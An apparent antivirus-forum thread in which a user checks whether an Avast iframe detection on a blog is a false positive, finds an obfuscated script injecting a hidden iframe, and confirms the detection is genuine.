IFrame-EB on stephenfry.com - is this a false positive?

Avast has detected “HTML:IFrame-EB [trj]” on hxxp://www.stephenfry.com/blog (I’ve substituted x for t in the URL).

My browser is Opera 9.64 on XP SP3 with JavaScript turned off. I’ve used curl to fetch the contents to look at in a text editor.

It looks to me as if the suspect content is merely a web bug (1x1 GIF) served up by hxxp://ad.uk.doubleclick.net

The script content has some randomization so I can’t be sure where I’d be taken if I turned JavaScript back on.

Should I report this as a false positive?

Hello,

It looks they are fixing the problem right now - probably not a false positive.

Regards

The web site is still displaying a holding message. I’ve kept copies of the old content and will compare when the site returns.

The URLs in the iframe all belong to DoubleClick. Is it just having a web bug in an iframe that is giving the IFrame-EB?

Look out for script tags that might be obfuscated as they are frequently what generate the iframe rather than visible iframe tags in the page source.

The web shield has been very hot on these alerts (hacked sites) and of all those that I have checked out in the forums, all have to date proved to have been good detections.

Okay, I’ve found it. The obfuscated script resolves to an invisible iframe containing seo**use.*n where the asterisks stand for abc in this post.

Thanks for the explanation.

So the warning from Avast was a genuine positive.

You’re welcome, the detection is most certainly good.